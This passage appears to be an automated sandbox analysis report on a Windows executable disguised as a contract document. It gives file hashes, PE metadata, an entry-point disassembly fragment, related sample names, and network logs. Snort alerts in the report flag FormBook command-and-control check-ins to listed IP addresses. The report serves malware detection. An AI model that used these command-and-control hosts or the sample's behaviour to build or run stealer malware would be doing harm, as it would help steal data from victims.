                                                        • 35.228.227.140
                                                        WB4L25Jv37.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                                        • 142.250.186.106
                                                        BL.htmlGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                                        • 172.217.16.142
                                                        PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                                        • 142.250.186.138
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 142.250.186.66
                                                        dCoLEiYyx1.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        GDJWHqItQO.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 142.250.186.66
                                                        2o0y7CvHF2.exeGet hashmaliciousBrowse
                                                        • 35.187.82.108
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 142.250.186.66
                                                        kBJlVQuchM.exeGet hashmaliciousBrowse
                                                        • 216.239.32.21
                                                        RODFm7tAfQ.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        zk8Jq3gpa5.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        Shipment Document BL,INV and packing list.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        rtofwqxq.exeGet hashmaliciousBrowse
                                                        • 216.58.212.131

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19CustomerStatement.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Payment.htmlGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        EmployeeAnnualReport.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Customer Statement.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Remittance advice.htmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Customer Statement.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Order-10236587458.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        RFQ_110199282773666355627277288.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        EMG 3.0.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        QUOTATION.xlsxGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        VM_629904-26374.htmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        caraganas.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Notification 466022.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Fax #136.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Purchase Order22420.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        ceFlxYfe4F.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Fatura.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Reports #176.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        SecuriteInfo.com.VB.Heur2.EmoDldr.5.B611173F.Gen.18420.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):4.293725930665568
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:UAE CONTRACT SUPPLY.exe
                                                        File size:458752
                                                        MD5:9da74a6d583c801677c0e2fde51586ba
                                                        SHA1:e1af77b99ca69e4737fa4d73a77e5702d5c13e91
                                                        SHA256:9d295dd246f6844b1bfe945cdf914a1615d0dacd9aa9f40d1276bc75f796268c
                                                        SHA512:d3bc9d90d2ce4945bc4cf3d8108272f88bd24e7bc12de99c5a3a36043a4728b2865f97d64c59bc9fcb9f80cd5c87e33cad5d0b3b8157a54591b85cdcf0a16328
                                                        SSDEEP:1536:3bLxrsc45V0M8wBEzkXZ8RuMI8sFjE2ik+W65tikWmBaHHG7:LLTSuMBezkUu8WjE2Z+DtikWmBaHHG7
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....!Z.................0..........H........@....@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x5A21D1E1 [Fri Dec 1 22:04:17 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                        Entrypoint Preview

                                                        Instruction
                                                        push 00404264h
                                                        call 00007F29048150D5h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        cmp byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        and ah, bl
                                                        sub byte ptr [edx+42BA4D36h], FFFFFF8Eh
                                                        arpl word ptr [edi-2A28310Fh], si
                                                        rol byte ptr [eax], cl
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [edx+00h], al
                                                        push es
                                                        push eax
                                                        add dword ptr [ecx], 54h
                                                        jc 00007F2904815147h
                                                        add byte ptr fs:[eax], bl
                                                        add eax, dword ptr [eax]
                                                        add byte ptr [eax], al
                                                        add bh, bh
                                                        int3
                                                        xor dword ptr [eax], eax
                                                        and byte ptr [esi-01h], ah
                                                        retn 7379h
                                                        mov esp, 70824472h
                                                        add eax, E95CAFBAh
                                                        mov eax, 96D22F46h
                                                        test al, 21h
                                                        fild word ptr [esi-7Bh]
                                                        mov eax, ebx
                                                        xor eax, BEEDD1D0h
                                                        cmp cl, byte ptr [edi-53h]
                                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                                        or al, 00h
                                                        stosb
                                                        add byte ptr [eax-2Dh], ah
                                                        xchg eax, ebx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add ch, byte ptr [esi]
                                                        add byte ptr [eax], al
                                                        out dx, al
                                                        daa
                                                        add byte ptr [eax], al
                                                        add byte ptr [6D6F4C00h], cl
                                                        insd
                                                        insb
                                                        jns 00007F2904815149h
                                                        je 00007F2904815147h
                                                        jc 00007F2904815150h
                                                        add byte ptr [4D000901h], cl
                                                        outsb
                                                        insd
                                                        imul esp, dword ptr [ebx+74h], 00006E65h

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x137140x3c.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x5aa64.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x30
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xd8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x12b240x13000False0.444464432566data6.20247491398IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .data0x140000x19cc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x160000x5aa640x5b000False0.0544755537431data3.57347405525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x161d80x42028data
                                                        RT_ICON0x582000x468GLS_BINARY_LSB_FIRST
                                                        RT_ICON0x586680x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                        RT_ICON0x5ac100x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                        RT_ICON0x5bcb80x10828dBase III DBT, version number 0, next free block index 40
                                                        RT_ICON0x6c4e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                        RT_GROUP_ICON0x707080x5adata
                                                        RT_VERSION0x707640x300dataChineseChina

                                                        Imports

                                                        DLLImport
                                                        USER32.DLLHideCaret
                                                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0804 0x04b0
                                                        LegalCopyrightInternal Verify Number,88
                                                        InternalNameVrdihftetgo6
                                                        FileVersion1.00
                                                        CompanyNameInternal Verify Number,88
                                                        LegalTrademarksInternal Verify Number,88
                                                        ProductNameTred6
                                                        ProductVersion1.00
                                                        OriginalFilenameVrdihftetgo6.exe

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        ChineseChina

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        02/25/21-15:28:20.874775TCP1201ATTACK-RESPONSES 403 Forbidden804975134.102.136.180192.168.2.6
                                                        02/25/21-15:28:31.319640TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.6
                                                        02/25/21-15:28:36.463718TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6104.21.32.11
                                                        02/25/21-15:28:36.463718TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6104.21.32.11
                                                        02/25/21-15:28:36.463718TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6104.21.32.11
                                                        02/25/21-15:28:57.410074TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.634.102.136.180
                                                        02/25/21-15:28:57.410074TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.634.102.136.180
                                                        02/25/21-15:28:57.410074TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.634.102.136.180
                                                        02/25/21-15:28:57.549735TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.6

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 25, 2021 15:27:34.845195055 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.902072906 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.902928114 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.902947903 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.960144997 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976227045 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976279020 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976319075 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976358891 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.977421999 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.977448940 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.010773897 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.067878962 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.067979097 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.069430113 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.130521059 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344265938 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344293118 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344309092 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344326019 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344342947 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344396114 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.344425917 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.344432116 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.348267078 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.348299026 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.348428011 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.348448038 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.352293968 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.352324963 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.352385044 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.352400064 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.356398106 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.356426954 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.356524944 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.356559992 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.360461950 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.360491037 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.360615015 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.363842010 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.363874912 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.363997936 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.364026070 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.400667906 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.400763988 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.400851965 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.400897980 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.402714014 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.402760983 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.402853012 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.402888060 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.406702995 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.406771898 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.406838894 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.406871080 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.410836935 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.410886049 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.410983086 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.411034107 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.414963007 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.415035009 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.415090084 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.415124893 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.418934107 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.418999910 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.419064999 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.419095993 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.422894001 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.422943115 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.423062086 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.423089981 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.426944971 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.426980019 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.427124023 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.427151918 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.430870056 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.430893898 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.431045055 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.434407949 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.434427977 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.434585094 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.434619904 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.437964916 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.437983036 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.438077927 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.441648006 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.441701889 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.441809893 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.441854000 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.445099115 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.445138931 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.445247889 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.445278883 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.448672056 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.448693991 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.448916912 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.452217102 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.452244997 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.452334881 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.452358961 CET49731443192.168.2.6142.250.184.65

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 25, 2021 15:26:36.363197088 CET6204453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:26:36.415146112 CET53620448.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:26:37.083556890 CET6379153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:26:37.207940102 CET53637918.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:26:37.499722958 CET6426753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:26:37.548569918 CET53642678.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:01.039057970 CET4944853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:01.090601921 CET53494488.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:03.534804106 CET6034253192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:03.583540916 CET53603428.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:04.535751104 CET6134653192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:04.584486961 CET53613468.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:05.010003090 CET5177453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:05.083044052 CET53517748.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:10.154453039 CET5602353192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:10.203207016 CET53560238.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:26.673043013 CET5838453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:26.730257034 CET53583848.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:27.248931885 CET6026153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:27.297878981 CET53602618.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:27.884032011 CET5606153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:27.912038088 CET5833653192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:27.944832087 CET53560618.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:27.970105886 CET53583368.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:28.377211094 CET5378153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:28.434453964 CET53537818.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:28.983582973 CET5406453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:29.040890932 CET53540648.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:29.586369038 CET5281153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:29.643608093 CET53528118.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:30.222332954 CET5529953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:30.273936987 CET53552998.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:30.751652002 CET6374553192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:30.800967932 CET53637458.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:30.970714092 CET5005553192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:31.019571066 CET53500558.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:31.933904886 CET6137453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:31.991522074 CET53613748.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:32.505878925 CET5033953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:32.563148022 CET53503398.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:32.652925014 CET6330753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:32.712477922 CET53633078.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:34.701713085 CET4969453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:34.759253979 CET53496948.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:34.770870924 CET5498253192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:34.839993000 CET53549828.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:35.682416916 CET5001053192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:35.731241941 CET53500108.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:37.031013012 CET6371853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:37.092623949 CET53637188.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:37.407264948 CET6211653192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:37.456093073 CET53621168.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:38.197658062 CET6381653192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:38.256480932 CET53638168.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:39.326152086 CET5501453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:40.326461077 CET5501453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:41.342689037 CET5501453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:41.391722918 CET53550148.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:42.336472988 CET6220853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:43.343368053 CET6220853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:43.394613981 CET53622088.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:44.343007088 CET5757453192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:44.394748926 CET53575748.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:45.676320076 CET5181853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:45.725630045 CET53518188.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:47.033123016 CET5662853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:47.085913897 CET53566288.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:48.191987991 CET6077853192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:48.243650913 CET53607788.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:49.209219933 CET5379953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:49.257906914 CET53537998.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:50.176558018 CET5468353192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:50.228135109 CET53546838.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:51.125828981 CET5932953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:51.174660921 CET53593298.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:52.146334887 CET6402153192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:52.195430040 CET53640218.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:27:57.714442968 CET5612953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:27:57.791071892 CET53561298.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:14.912911892 CET5817753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:14.984534025 CET53581778.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:15.180850029 CET5070053192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:15.232400894 CET53507008.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:20.623471975 CET5406953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:20.691571951 CET53540698.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:25.941293001 CET6117853192.168.2.68.8.8.8
